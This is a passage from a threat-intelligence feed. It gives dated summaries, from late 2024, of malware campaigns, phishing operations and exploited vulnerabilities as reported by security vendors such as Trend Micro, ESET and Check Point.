Cryptojacking_Campaign_Target_Docker_and_Kubernetes
LOW
+
Intel Source:
SOC Radar
Intel Name:
Cryptojacking_Campaign_Target_Docker_and_Kubernetes
Date of Scan:
2024-12-14
Impact:
LOW
Summary:
A cryptojacking campaign is targeting unsecured Docker and Kubernetes systems by exploiting misconfigurations to gain unauthorized access. The attackers exploit open Docker API endpoints without proper authentication, which allow them to deploy malicious programs for mining cryptocurrency, especially Monero. They primarily target high-performance cloud systems in industries such as finance, healthcare, and technology. These attacks slow down systems, increase costs, and disrupt operations.
Source: https://socradar.io/blog-cryptojacking-campaign-targets-docker-and-kubernetes-surge-in-container-based-attacks/
2024-12-13
China_linked_APT_Targets_Southeast_Asia
MEDIUM
+
Intel Source:
Symantec
Intel Name:
China_linked_APT_Targets_Southeast_Asia
Date of Scan:
2024-12-13
Impact:
MEDIUM
Summary:
Threat actors linked to China-based APT groups have targeted several high-profile organizations in Southeast Asia since October 2023, including government ministries, an air traffic control body, a telecoms company, and a media outlet. These attacks appear to be focused on intelligence gathering. The attackers employ a mix of open-source and living-off-the-land tools, including a proxy tool called Rakshasa and DLL sideloading techniques used by the APT group Earth Baku (APT41). Their tactics involve using remote access tools to execute commands, install keyloggers, password collectors, reverse proxy tools, and custom DLLs to intercept login credentials and maintain access to compromised systems.
Source: https://www.security.com/threat-intelligence/china-southeast-asia-espionage#APT
2024-12-12
Rise_of_Remcos_RAT_in_Q3_2024
LOW
+
Intel Source:
Mcafee
Intel Name:
Rise_of_Remcos_RAT_in_Q3_2024
Date of Scan:
2024-12-12
Impact:
LOW
Summary:
Researchers from McAfee Labs have observed a considerable increase in the Remcos RAT threat in Q3 2024, indicating that it is a major cybersecurity concern. This malware, which is usually distributed through phishing emails and malicious attachments, allows attackers to remotely manipulate affected devices, aiding espionage, data theft, and system manipulation. Remcos RAT's rising sophistication highlights the necessity of knowing its methods and implementing strong cybersecurity measures, such as regular updates, email filtering, and network monitoring, to reduce its impact and preserve critical data.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-stealthy-stalker-remcos-rat/
2024-12-12
Advanced_Snake_Keylogger_Variant
LOW
+
Intel Source:
ANY.RUN
Intel Name:
Advanced_Snake_Keylogger_Variant
Date of Scan:
2024-12-12
Impact:
LOW
Summary:
Researchers from ANY.RUN have discovered a new variant of the Snake Keylogger family, known as "Nova," that displays enhanced evasion strategies and expanded data exfiltration capabilities. Snake Keylogger, a .NET-based malware discovered in 2020, is well-known for credential theft and keylogging via phishing campaigns. Nova, developed in VB.NET, uses obfuscation techniques such as .NET Reactor obfuscation and process hollowing to avoid detection.
Source: https://any.run/cybersecurity-blog/nova-keylogger-malware-analysis/
2024-12-12
AIZ_Network_Targets_Retail_and_Crypto
MEDIUM
+
Intel Source:
Silent Push
Intel Name:
AIZ_Network_Targets_Retail_and_Crypto
Date of Scan:
2024-12-12
Impact:
MEDIUM
Summary:
Researchers at Silent Push have discovered a large-scale phishing and pig-butchering network known as "Aggressive Inventory Zombies" (AIZ), which targeted major retail companies and cryptocurrency audiences. The effort impersonates organizations such as Etsy, Amazon, BestBuy, and Wayfair, using a popular website template and integrated chat services for phishing purposes.
Source: https://www.silentpush.com/blog/aiz-retail-crypto-phishing/?utm_source=rss&utm_medium=rss&utm_campaign=aiz-retail-crypto-phishing
2024-12-07
Cobalt_Strike_Infrastructure_Exposed
LOW
+
Intel Source:
Hunt.IO
Intel Name:
Cobalt_Strike_Infrastructure_Exposed
Date of Scan:
2024-12-07
Impact:
LOW
Summary:
Researchers from Hunt.IO have discovered a network of suspicious infrastructure running Cobalt Strike 4.10, the latest version released in July 2024. Despite efforts to prevent unauthorized use, threat actors continue to leverage its post-exploitation capabilities. The servers bear a distinct watermark shared by only five other IP addresses worldwide. Domains related to these servers, initially discovered on November 19, imitate well-known brands, indicating a focused phishing operation.
Source: https://hunt.io/blog/rare-watermark-links-cobalt-strike-team-servers-to-ongoing-suspicious-activity
2024-12-06
Malware_Campaign_Targets_Manufacturing_Industry
LOW
+
Intel Source:
Cyble
Intel Name:
Malware_Campaign_Targets_Manufacturing_Industry
Date of Scan:
2024-12-06
Impact:
LOW
Summary:
Researchers from Cyble have discovered a sophisticated malware campaign targeted at the manufacturing industry. To circumvent typical security systems and remotely execute payloads, the attackers employ a misleading LNK file disguised as a PDF and exploit several Living-off-the-Land Binaries (LOLBins), such as ssh.exe, powershell.exe, and mshta.exe.
Source: https://cyble.com/blog/threat-actor-targets-manufacturing-industry-with-malware/
2024-12-06
Data_Exfiltration_via_Formbook_Malware
LOW
+
Intel Source:
Cofense
Intel Name:
Data_Exfiltration_via_Formbook_Malware
Date of Scan:
2024-12-06
Impact:
LOW
Summary:
Researchers from Cofense have discovered a phishing campaign in which attackers mimic legitimate HR communication about year-end leave approvals. The email, with the subject line "Mandatory Leave Notice for all employees", uses professional language to lure employees into clicking on a malicious link that claims the recipient's leave request has been approved. When the user clicks the link, it downloads a .zip file containing an Excel (.xls) document related to Christmas leave schedules, through which the Formbook malware is deployed to steal sensitive information from the victim.
Source: https://cofense.com/blog/end-of-year-pto-days-off-and-data-exhilaration-with-formbook
2024-12-06
Meeten_Malware
LOW
+
Intel Source:
Cado Security Labs
Intel Name:
Meeten_Malware
Date of Scan:
2024-12-06
Impact:
LOW
Summary:
Researchers at Cado Security Labs have uncovered a scam targeting Web3 professionals with crypto-stealing malware called Realst, which works on both macOS and Windows. The scam is operated by a fake company called Meetio, which frequently changes its name and has previously been called Clusee, Cuesee, and Meeten. The scammers lure victims through Telegram with fake business opportunities and then convince them to download a fake meeting app, Meeten, from their website, which installs the Realst info-stealer to access cryptocurrency wallets and sensitive information. Their websites also contain malicious JavaScript that can steal crypto directly from web browsers even without downloading malware.
Source: https://www.cadosecurity.com/blog/meeten-malware-threat
2024-12-05
BlueAlpha_Abuses_Cloudflare_Tunneling_Service
LOW
+
Intel Source:
Recorded Future
Intel Name:
BlueAlpha_Abuses_Cloudflare_Tunneling_Service
Date of Scan:
2024-12-05
Impact:
LOW
Summary:
Researchers at Insikt Group have uncovered an ongoing cyber-espionage campaign operated by a Russian threat actor called BlueAlpha. The group has been active since 2014 and frequently targets Ukrainian organizations and individuals. BlueAlpha uses spearphishing emails with malicious attachments to infect victims with malware such as GammaDrop, GammaLoad, GammaSteel, and Pterodo. These malware families are capable of stealing data, capturing credentials, and maintaining long-term access to compromised systems. The group is using advanced tactics such as HTML smuggling to deliver malware via VBScript and leveraging Cloudflare Tunnels for staging its malware.
Source: https://go.recordedfuture.com/hubfs/reports/cta-ru-2024-1205.pdf
2024-12-05
DarkNimbus_Backdoor_Targets_Multiple_Platforms
LOW
Intel Source:
Trend Micro
Intel Name:
DarkNimbus_Backdoor_Targets_Multiple_Platforms
Date of Scan:
2024-12-05
Impact:
LOW
Summary:
Researchers from Trend Micro have discovered that the Earth Minotaur threat group is using the MOONSHINE exploit kit to exploit vulnerabilities in Android messaging apps, primarily targeting Tibetan and Uyghur communities. MOONSHINE, which has been updated with new capabilities compared to the 2019 version, has been deployed on over 55 servers and is used to distribute the recently found DarkNimbus backdoor. This backdoor, which also has a Windows variant, reflects Earth Minotaur's cross-platform attack strategy, affecting both Android and Windows devices.
Source: https://www.trendmicro.com/en_us/research/24/l/earth-minotaur.html
2024-12-05
Investment_Scam
LOW
Intel Source:
Cyberarmor
Intel Name:
Investment_Scam
Date of Scan:
2024-12-05
Impact:
LOW
Summary:
Cyberarmor researchers have uncovered an investment scam in which scammers target individuals through online platforms. They trick victims by offering job opportunities or high-yield investments, using tactics like social engineering, deceptive websites, and cryptocurrency transactions. The scam operates through a website called totallysoftware[.]tech, which appears legitimate but requires a special registration code provided by the scammer through WhatsApp. The scammers also use a private backend dashboard to manage victim accounts and oversee the operation.
Source: https://cyberarmor.tech/investment-scam-the-operations/
2024-12-04
SecretBlizzard_Compromising_Storm0156_Infrastructure
MEDIUM
Intel Source:
Microsoft and Lumen
Intel Name:
SecretBlizzard_Compromising_Storm0156_Infrastructure
Date of Scan:
2024-12-04
Impact:
MEDIUM
Summary:
Researchers from Microsoft and Lumen Labs have uncovered a cyber campaign conducted by a Russian threat actor called Secret Blizzard, also known as Turla. This group infiltrated 33 C2 servers previously used by a Pakistani threat group called Storm-0156, which is known for espionage activities. Storm-0156 is associated with two major groups, SideCopy and Transparent Tribe. Secret Blizzard has been exploiting Storm-0156's infrastructure for the past few years. In 2023, it used Storm-0156's pre-existing access to deploy its own malware, such as TwoDash and Statuezy, into networks linked to various entities within the Afghan government. It also gained access to Pakistan-based workstations, from which it extracted sensitive data. By 2024, Secret Blizzard had expanded its tactics by using malware such as Wainscot and CrimsonRAT, which had been used in attacks against India's government and military. Secret Blizzard uses this malware to gather additional data.
Source: https://blog.centurylink.com/snowblind-the-invisible-hand-of-secret-blizzard/?utm_source=rss&utm_medium=rss&utm_campaign=snowblind-the-invisible-hand-of-secret-blizzard https://www.microsoft.com/en-us/security/blog/2024/12/04/frequent-freeloader-part-i-secret-blizzard-compromising-storm-0156-infrastructure-for-espionage/
2024-12-04
SocksSystemz_Botnet
LOW
Intel Source:
Bitsight
Intel Name:
SocksSystemz_Botnet
Date of Scan:
2024-12-04
Impact:
LOW
Summary:
Researchers from Bitsight have identified a malware called Socks5Systemz that turns compromised systems into proxy servers, allowing criminals to hide their activities online. It has been active since 2013 and was often delivered as part of other malware such as Andromeda and Trickbot, but only became widely recognized in 2023. Researchers also found that Socks5Systemz had infected 250,000 systems around the world in 2023, and that these systems were rented out through a service called PROXY.AM to hide illegal activities such as account hacking and other crimes. Socks5Systemz provides criminals with anonymity, which makes them difficult to track and stop.
Source: https://www.bitsight.com/blog/proxyam-powered-socks5systemz-botnet
2024-12-04
Parano_Malware_Targeting_Users
LOW
Intel Source:
Cyfirma
Intel Name:
Parano_Malware_Targeting_Users
Date of Scan:
2024-12-04
Impact:
LOW
Summary:
Researchers at CYFIRMA discovered the newly introduced "Parano" malware family, created by the cybercriminal actor "Paranodeus." This malware package contains Parano Stealer, Parano Ransomware, and Parano Screen Locker, all of which are written in Python and use advanced anti-analysis, persistence, and data exfiltration methods.
Source: https://cyfirma.com/research/exploration-of-parano-multiple-hacking-tools-capabilities/
2024-12-04
Andromeda_Backdoor
LOW
Intel Source:
Cybereason
Intel Name:
Andromeda_Backdoor
Date of Scan:
2024-12-04
Impact:
LOW
Summary:
Researchers from Cybereason have identified a cluster of C2 servers related to Andromeda, also known as Gamarue. This malware has been active since at least 2011 and has been used by multiple cybercriminal groups. It is distributed through phishing emails, infected external drives, and as a secondary payload from other malware. Once active, it can download and execute additional malware, steal sensitive information like passwords, and establish a backdoor for remote access. Andromeda is targeting manufacturing and logistics companies in the Asia-Pacific (APAC) region with the aim of conducting industrial espionage.
Source: https://www.cybereason.com/blog/new-cluster-andromeda-gamrue-c2
2024-12-04
Diving_Deep_into_Zephyr_Coin
LOW
Intel Source:
QuickHeal
Intel Name:
Diving_Deep_into_Zephyr_Coin
Date of Scan:
2024-12-04
Impact:
LOW
Summary:
Zephyr Coin (ZEPH), launched in 2018, is a privacy-focused digital currency that uses a proof-of-stake system, allowing users to earn rewards by holding their coins. It is known for its strong privacy features and user-friendly design, making it a popular choice for secure online transactions. However, as its popularity grows, cybercriminals are increasingly targeting users through malware that spreads in four forms: Visual Basic Script (VBS), Batch Processing File (BAT), PowerShell Script (PS1), and Portable Executable (PE).
Source: https://blogs.quickheal.com/crypto-mining-malware-zephyr/
2024-12-04
Payroll_Pirates_Phishing_Campaign
LOW
Intel Source:
Silent Push
Intel Name:
Payroll_Pirates_Phishing_Campaign
Date of Scan:
2024-12-04
Impact:
LOW
Summary:
Researchers from Silent Push have discovered an ongoing phishing attack known as "Payroll Pirates," which targets HR payroll systems via redirection scams. The gang employs search ads with brand keywords to promote phishing sites, website builders to quickly create domains, and corporate directory structures to boost credibility.
Source: https://www.silentpush.com/blog/payroll-pirates/?utm_source=rss&utm_medium=rss&utm_campaign=payroll-pirates
2024-12-04
Docusign_Phishing_Attacks
LOW
Intel Source:
Cado Security Labs
Intel Name:
Docusign_Phishing_Attacks
Date of Scan:
2024-12-04
Impact:
LOW
Summary:
Cado researchers have discovered a new spearphishing campaign targeting technology executives through fake DocuSign emails. These emails usually state that a document is waiting for the recipient to sign and include a link to open it, but the link leads to a fake DocuSign login page where credentials are stolen. In this campaign, the attackers send the phishing emails from legitimate, already compromised email accounts, such as Japanese business email accounts.
Source: https://www.cadosecurity.com/blog/the-growing-threat-of-docusign-phishing-attacks
2024-12-03
Infostealer_From_Plain_to_Obfuscated_Version
LOW
Intel Source:
ISC.SANS
Intel Name:
Infostealer_From_Plain_to_Obfuscated_Version
Date of Scan:
2024-12-03
Impact:
LOW
Summary:
Trap-Stealer is an example of a Python-based malware that uses multiple obfuscation techniques to evade detection and analysis. These techniques include using meaningless classes and variables, base64 encoding to disguise payloads, encryption with various keys, and zlib compression to obfuscate its real functionality. The malware is dynamically decrypted and executed, making static analysis difficult. Additionally, an obfuscation tool is included in the repository, allowing attackers to automate the creation of obfuscated script versions. While the obfuscation increases file size and execution overhead, it significantly complicates detection.
Source: https://isc.sans.edu/diary/From+a+Regular+Infostealer+to+its+Obfuscated+Version/31484/
2024-12-03
Gafgyt_Malware_Targets_Docker_Remote_API_Servers
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Gafgyt_Malware_Targets_Docker_Remote_API_Servers
Date of Scan:
2024-12-03
Impact:
MEDIUM
Summary:
Trend Micro researchers have identified a shift in the behavior of the Gafgyt malware, which traditionally targets vulnerable IoT devices. The malware is now exploiting misconfigured Docker Remote API servers to deploy itself. Attackers create a Docker container using a legitimate "alpine" image to spread the malware and infect the servers. Once deployed, the Gafgyt botnet can be used to launch DDoS attacks on the targeted servers. This marks a significant expansion of the malware's attack scope beyond IoT devices.
Source: https://www.trendmicro.com/en_us/research/24/l/gafgyt-malware-targeting-docker-remote-api-servers.html
2024-12-03
SmokeLoader_Targets_Entities_in_Taiwan
LOW
Intel Source:
Fortinet
Intel Name:
SmokeLoader_Targets_Entities_in_Taiwan
Date of Scan:
2024-12-03
Impact:
LOW
Summary:
FortiGuard researchers have uncovered a campaign in which attackers use SmokeLoader malware to target sectors such as manufacturing, healthcare, IT, and other industries in Taiwan. SmokeLoader is known for its advanced techniques and acts as a downloader to deliver additional malware. In this campaign, the attack begins with phishing emails containing malicious attachments disguised as business communications, such as a quotation. The emails use local language and phrases and are sent in bulk with the same content, including unaltered recipient details in file names. SmokeLoader performs attacks directly by downloading plugins from its C2 server.
Source: https://www.fortinet.com/blog/threat-research/sophisticated-attack-targets-taiwan-with-smokeloader
2024-12-03
Howling_Scorpius_Ransomware_Threat
LOW
Intel Source:
Palo Alto
Intel Name:
Howling_Scorpius_Ransomware_Threat
Date of Scan:
2024-12-03
Impact:
LOW
Summary:
Researchers from Palo Alto have discovered that the Howling Scorpius ransomware gang, which has been active since early 2023, operates the Akira ransomware-as-a-service (RaaS) and consistently ranks among the top five ransomware groups. Using a double-extortion tactic, the group targets small to medium-sized businesses in North America, Europe, and Australia, spanning sectors such as education, government, manufacturing, technology, and pharmaceuticals. Its operations include encryptors for Windows, Linux, and ESXi hosts, with continual tool development that increases the risk for enterprises.
Source: https://unit42.paloaltonetworks.com/threat-assessment-howling-scorpius-akira-ransomware/
2024-12-03
BYOVD_Attacks_Surge
MEDIUM
Intel Source:
CrowdStrike
Intel Name:
BYOVD_Attacks_Surge
Date of Scan:
2024-12-03
Impact:
MEDIUM
Summary:
Over the past 18 months, Bring Your Own Vulnerable Driver (BYOVD) attacks have increased significantly, with adversaries attempting to bypass endpoint detection and response (EDR) solutions. In these attacks, attackers exploit known vulnerabilities in kernel drivers to perform privileged operations, such as terminating security products or bypassing anti-tampering protections. In September 2024, a CrowdStrike customer experienced an intrusion where six vulnerable drivers were used to evade the Falcon sensor, but all were detected or blocked. The incident resulted in 48 alerts across targeted endpoints, including malware execution and other malicious activities.
Source: https://www.crowdstrike.com/en-us/blog/falcon-prevents-vulnerable-driver-attacks-real-world-intrusion/
2024-12-03
Extracting_Executables_from_Malicious_Word_Docs
LOW
Intel Source:
ISC.SANS
Intel Name:
Extracting_Executables_from_Malicious_Word_Docs
Date of Scan:
2024-12-03
Impact:
LOW
Summary:
Researchers at SANS have found and analyzed a sample that is a Word document with an embedded executable. To extract the embedded executable from the Word document, they used `file-magic.py` to identify the document as an OOXML file. They then used `zipdump.py` to inspect the ZIP container and find the OLE object (e.g., `oleObject1.bin`). With `oledump.py`, they analyzed the OLE stream, extracted metadata such as the file hash, and finally used the `-e` option to extract the executable. This process allows analysis of the malicious executable, which requires user interaction to run, typically obtained through social engineering.
Source: https://isc.sans.edu/diary/Extracting+Files+Embedded+Inside+Word+Documents/31486/
2024-12-03
Unveiling_RevC2_and_Venom_Loader
LOW
Intel Source:
Zscaler
Intel Name:
Unveiling_RevC2_and_Venom_Loader
Date of Scan:
2024-12-03
Impact:
LOW
Summary:
Zscaler ThreatLabz discovered two major campaigns in which the RevC2 and Venom Loader malware are deployed by leveraging Venom Spider's MaaS tools. Venom Spider, also known as GOLDEN CHICKENS, is a threat actor known for offering Malware-as-a-Service (MaaS) tools such as VenomLNK, TerraLoader, TerraStealer, and TerraCryptor. RevC2 is a malware that uses WebSockets to communicate with its C2 server, allowing it to steal sensitive information such as cookies and passwords. It can also enable remote code execution (RCE) on compromised systems. Venom Loader, on the other hand, is a malware loader that customizes its payload for each victim and uses the victim's system name to encode the payload.
Source: https://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader#conclusion
2024-12-02
The_TA4557_Attack_Analysis
MEDIUM
Intel Source:
The DFIR Report
Intel Name:
The_TA4557_Attack_Analysis
Date of Scan:
2024-12-02
Impact:
MEDIUM
Summary:
In March 2024, a malicious campaign attributed to TA4557 (linked to FIN6 and other groups like Cobalt Group and Evilnum) was detected after a user downloaded a malicious resume zip. The attack began with the execution of a malicious .lnk file, leading to the deployment of a series of tools, including a malicious DLL and WMI-based scripts, to establish a beacon to the attacker's command and control server. After initial discovery activity, the threat actor deployed Cobalt Strike and attempted to exploit a vulnerability (CVE-2023-27532) on a backup server to gain admin access. The attacker moved laterally, creating new administrator accounts, deploying Cloudflared, and scanning the network. Activity ceased temporarily but resumed with the removal of persistence tasks and continued use of Cobalt Strike and Cloudflared tunnels. Eventually, the attacker was evicted from the environment.
Source: https://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/
2024-12-02
KimSooki_Email_Phishing_Campaign
LOW
Intel Source:
Genians
Intel Name:
KimSooki_Email_Phishing_Campaign
Date of Scan:
2024-12-02
Impact:
LOW
Summary:
Genians researchers have identified phishing attacks targeting Korea that are linked to the Kimsuky group. The attackers impersonate trusted organizations or services, such as government agencies, financial institutions, or portal companies, to deceive recipients. Recently, phishing emails appeared to come from the Korean government's electronic document service, National Secretary, and contained links to fraudulent websites hosted on a Korean domain service called MyDomain.Korea. These phishing campaigns do not always carry malware but often use URLs that redirect recipients to fake websites where sensitive information can be stolen.
Source: https://www.genians.co.kr/blog/threat_intelligence/kimsuky-cases
2024-12-02
Printer_Support_Scam_Campaign
LOW
Intel Source:
Malwarebytes
Intel Name:
Printer_Support_Scam_Campaign
Date of Scan:
2024-12-02
Impact:
LOW
Summary:
Researchers at Malwarebytes have discovered a new fraud that targets consumers looking for printer support online. The scam consists of fraudulent search advertisements that resemble the official websites of well-known printer brands such as HP and Canon. Victims who click these adverts are led to bogus sites and urged to download fake printer drivers, which usually fail to install and display faked error messages. The scammers' ultimate goal is to get consumers to contact them, which may lead to extortion or data theft via remote access.
Source: https://www.malwarebytes.com/blog/scams/2024/11/printer-problems-beware-the-bogus-help
2024-12-02
AgentTesla_Campaign
LOW
Intel Source:
CERT-AGID
Intel Name:
AgentTesla_Campaign
Date of Scan:
2024-12-02
Impact:
LOW
Summary:
CERT-AGID researchers have identified a malware campaign spread through emails. Initially, the malware failed to activate due to technical problems, but the attackers have since fixed the issue and relaunched the malware with a .NET file protected by AES encryption. A tool called CyberChef is used to decrypt the malware. After decryption, the malware is identified as AgentTesla, a common tool used to steal sensitive information. This version differs from the usual ones because it is loaded directly into memory rather than being written to the user's machine.
Source: https://cert-agid.gov.it/news/campagna-agenttesla-ritorna-in-azione-dopo-un-attacco-fallito-aggiornato-loader-e-nuove-tecniche-di-cifratura/
2024-12-02
Horns_and_Hooves_Campaign_Updates
LOW
Intel Source:
Securelist
Intel Name:
Horns_and_Hooves_Campaign_Updates
Date of Scan:
2024-12-02
Impact:
LOW
Summary:
Securelist researchers have uncovered a campaign called Horns&Hooves, which has been active since March 2023. The primary targets of this campaign are private users, retailers, and service companies in Russia. The attackers send phishing emails containing ZIP archives with malicious JavaScript or HTML Application files disguised as legitimate documents, such as purchase requests or reconciliation statements. These emails trick users into downloading and installing NetSupport RAT, a tool that gives attackers full remote access to the victim's computer. Additionally, the attackers installed a tool called Remote Manipulator System (RMS), which they renamed BurnsRAT. This tool gives them full remote control over the compromised system, including the ability to transfer files, run commands, and access the desktop using Remote Desktop Protocol (RDP).
Source: https://securelist.com/horns-n-hooves-campaign-delivering-netsupport-rat/114740/
2024-11-29
Exploitation_of_Zyxel_Firewalls
MEDIUM
Intel Source:
SOC Radar
Intel Name:
Exploitation_of_Zyxel_Firewalls
Date of Scan:
2024-11-29
Impact:
MEDIUM
Summary:
A critical vulnerability has been disclosed in Zyxel firewalls, identified as CVE-2024-11667, with a CVSS score of 7.5. The flaw lies in the web management interface of certain firmware versions and allows attackers to upload or download files through specially crafted URLs. Researchers have linked this vulnerability to Helldown ransomware, which exploits it to gain initial access to networks. Exploitation of this vulnerability can lead to data theft and enable attackers to establish VPN connections, alter firewall settings, and execute further malicious actions.
Source: https://socradar.io/zyxel-firewalls-exploited-for-ransomware-attacks-20-security-flaws-discovered-in-advantech-access-points/
2024-11-29
Analysis_of_APT_C_48_Phishing_Attack
MEDIUM
Intel Source:
360 Threat Intelligence Center
Intel Name:
Analysis_of_APT_C_48_Phishing_Attack
Date of Scan:
2024-11-29
Impact:
MEDIUM
Summary:
APT-C-48 (CNC), a threat actor with ties to a South Asian government, has been identified targeting various sectors such as government, military, education, and healthcare. They use spear-phishing emails with "resume"-related subjects to deliver malicious payloads. The malicious executable files are hidden in compressed attachments, with their icons disguised as PDF files and filenames obfuscated by blank characters to evade detection. When opened, these files download additional malicious components from a remote server, enabling further attacks.
Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247504896&idx=1&sn=42097a09cd3420fd7168ba1afc84939e&chksm=f9c1e709ceb66e1fd732a72853e48466ae332109a6200a58c1ddab56e1c7d90b902cbbd64027&scene=178&cur_album_id=1955835290309230595
2024-11-28
Beluga_Phishing_Campaign
LOW
Intel Source:
Threatdown
Intel Name:
Beluga_Phishing_Campaign
Date of Scan:
2024-11-28
Impact:
LOW
Summary:
Researchers from Threatdown have uncovered a phishing campaign targeting OneDrive users to steal their login credentials. It starts with an email containing an .htm attachment in which the recipient's email address is pre-filled along with their company logo. Victims are tricked into clicking a VIEW DOCUMENT button to access a file, which leads to a fake login page where the email address cannot be changed and the fake Sign In and Create Account buttons are non-functional. The entered credentials, along with the victim's email and IP address, are sent to the attackers via Telegram. After gaining access, attackers can steal sensitive files, spread malware, delete backups, and encrypt important data for ransom.
Source: https://www.threatdown.com/blog/beluga-phishing-campaign-targets-onedrive-credentials/
2024-11-28
Global_Netflix_Phishing_Campaign
LOW
Intel Source:
Bitdefender
Intel Name:
Global_Netflix_Phishing_Campaign
Date of Scan:
2024-11-28
Impact:
LOW
Summary:
Bitdefender researchers have discovered a large-scale phishing attack aimed at Netflix subscribers in 23 countries, including the United States, Germany, Spain, and Australia, in an attempt to obtain login credentials and credit card details. The campaign uses SMS messages that create urgency by claiming problems with subscription payments, driving people to bogus websites.
Source: https://www.bitdefender.com/en-us/blog/hotforsecurity/netflix-scam-stay-safe
2024-11-28
Python_Package_aiocpa_Targets_Crypto
LOW
Intel Source:
Reversing Labs
Intel Name:
Python_Package_aiocpa_Targets_Crypto
Date of Scan:
2024-11-28
Impact:
LOW
Summary:
Researchers at ReversingLabs have found a malicious Python module called aiocpa that is meant to exploit cryptocurrency wallets. Unlike traditional attacks on open-source repositories such as PyPI, the threat actors behind aiocpa did not use typosquatting or impersonation, instead releasing a crypto client tool to entice users before sending a malicious update.
Source: https://www.reversinglabs.com/blog/malicious-pypi-crypto-pay-package-aiocpa-implants-infostealer-code
2024-11-28
Exploring_Rockstar_Kit_FUD_Link_Techniques
LOW
Intel Source:
Trustwave
Intel Name:
Exploring_Rockstar_Kit_FUD_Link_Techniques
Date of Scan:
2024-11-28
Impact:
LOW
Summary:
Trustwave researchers have done the second part of an investigation into the Rockstar kit, focusing on real-world examples of phishing emails that utilize Rockstar's advanced techniques. The Rockstar platform promotes the creation of fully undetectable (FUD) links for phishing campaigns, which evade detection systems that examine the initial URL. These techniques include using link redirectors (e.g., shortened URLs, open redirects, and URL protection services), as well as abusing trusted services and sites to host phishing content or redirect victims.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rockstar-2fa-phishing-as-a-service-paas-noteworthy-email-campaigns/
2024-11-27
Bootkitty_The_First_UEFI_Bootkit_for_Linux
LOW
Intel Source:
ESET
Intel Name:
Bootkitty_The_First_UEFI_Bootkit_for_Linux
Date of Scan:
2024-11-27
Impact:
LOW
Summary:
ESET researchers have discovered the first UEFI bootkit created to target Linux systems, called Bootkitty. It is currently at an experimental stage rather than fully developed malware. Bootkitty's primary goal is to disable Linux kernel security checks and load extra programs during the Linux boot process. It specifically targets certain versions of Ubuntu and modifies the integrity verification functions in memory before the GRUB bootloader is executed. Additionally, the researchers identified an unsigned kernel module called BCDropper, which loads another kernel module using an ELF program.
Source: https://www.welivesecurity.com/en/eset-research/bootkitty-analyzing-first-uefi-bootkit-linux/
2024-11-27
Rockstar_2FA_A_Phishing_Platform
LOW
Intel Source:
Trustwave
Intel Name:
Rockstar_2FA_A_Phishing_Platform
Date of Scan:
2024-11-27
Impact:
LOW
Summary:
Trustwave researchers have identified a phishing tool called Rockstar 2FA, which is linked to a phishing campaign targeting Microsoft user accounts. The campaign employs an advanced technique called adversary-in-the-middle (AiTM), which allows attackers to bypass MFA and steal login credentials and session cookies. The phishing emails in this campaign use various lures such as fake document notifications, HR messages, and IT alerts. Rockstar 2FA operates as Platform-as-a-Service (PaaS), providing attackers with an easy-to-use tool and features such as MFA bypass, anti-bot protection, and multiple customizable login page templates for launching phishing attacks.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rockstar-2fa-a-driving-force-in-phishing-as-a-service-paas/
2024-11-27
PSLoramyra_Loader_Exploits_Scripts
LOW
Intel Source:
Any.Run
Intel Name:
PSLoramyra_Loader_Exploits_Scripts
Date of Scan:
2024-11-27
Impact:
LOW
Summary:
Researchers at Any.Run have found PSLoramyra, a powerful fileless loader that uses PowerShell, VBS, and BAT scripts to inject and execute malicious payloads directly in memory, avoiding typical detection methods. Its infection chain begins with a PowerShell script that creates essential files and establishes persistence via Windows Task Scheduler. The loader's hidden operation and small system footprint make it a major cybersecurity risk.
Source: https://any.run/cybersecurity-blog/psloramyra-malware-technical-analysis/
2024-11-27
Credit_Card_Malware_Targeting_Magento_Website
LOW
Intel Source:
Sucuri
Intel Name:
Credit_Card_Malware_Targeting_Magento_Website
Date of Scan:
2024-11-27
Impact:
LOW
Summary:
Sucuri researchers have observed that cybercriminals are targeting Magento ecommerce websites because of the valuable customer data they hold. Depending on the variant, the malware either creates fake credit card forms or directly steals payment details during checkout. It then encrypts the stolen data and sends it to a remote server. The attackers conduct these activities through malicious JavaScript injected into the Magento sites.
Source: https://blog.sucuri.net/2024/11/credit-card-skimmer-malware-targeting-magento-checkout-pages.html
2024-11-27
Advanced_Hunting_Unveiled
MEDIUM
Intel Source:
Qualys
Intel Name:
Advanced_Hunting_Unveiled
Date of Scan:
2024-11-27
Impact:
MEDIUM
Summary:
Researchers from Qualys have launched Advanced Hunting, a threat-hunting tool built into their Endpoint Detection and Response (EDR) platform. This capability helps security teams to proactively search for risks, uncover malicious behaviors, and identify potential breaches that may slip past traditional detection methods. Advanced Hunting uses the Qualys Query Language (QQL) to provide flexible operations such as field searches and string matching.
Source: https://blog.qualys.com/product-tech/2024/11/26/elevate-cyber-defense-with-qualys-advanced-hunting
2024-11-27
Snowflake_Security_Exploited_by_Hackers
LOW
Intel Source:
Krebsonsecurity
Intel Name:
Snowflake_Security_Exploited_by_Hackers
Date of Scan:
2024-11-27
Impact:
LOW
Summary:
A massive cybercrime operation aimed at Snowflake customers has been discovered, involving significant data theft and extortion. Two individuals have been arrested, but a third, "Kiberphant0m," continues to sell stolen data online. Evidence suggests that this hacker, who may have been a US Army soldier stationed in South Korea, exploited poor account security to gain access to important archives.
Source: https://krebsonsecurity.com/2024/11/hacker-in-snowflake-extortions-may-be-a-u-s-soldier/
2024-11-27
GodLoader_Targeting_Multiple_Operating_Systems
LOW
Intel Source:
Checkpoint
Intel Name:
GodLoader_Targeting_Multiple_Operating_Systems
Date of Scan:
2024-11-27
Impact:
LOW
Summary:
Researchers from Check Point have uncovered a malware called GodLoader that can infect multiple operating systems, including Windows, macOS, Linux, Android, and iOS. It leverages Godot Engine, a popular open-source game development platform, to execute malicious activities. It is distributed through the Stargazers Ghost Network, a Malware-as-a-Service operation hosted on GitHub. The attackers use Godot's scripting language, GDScript, to execute malicious commands and deliver malware. When GodLoader runs, it decrypts and executes malicious GDScripts and downloads additional malicious payloads, such as cryptocurrency miners like XMRig and credential-stealing malware like RedLine.
Source: https://research.checkpoint.com/2024/gaming-engines-an-undetected-playground-for-malware-loaders/
2024-11-26
The_Examination_of_Elpaco_Ransomware
LOW
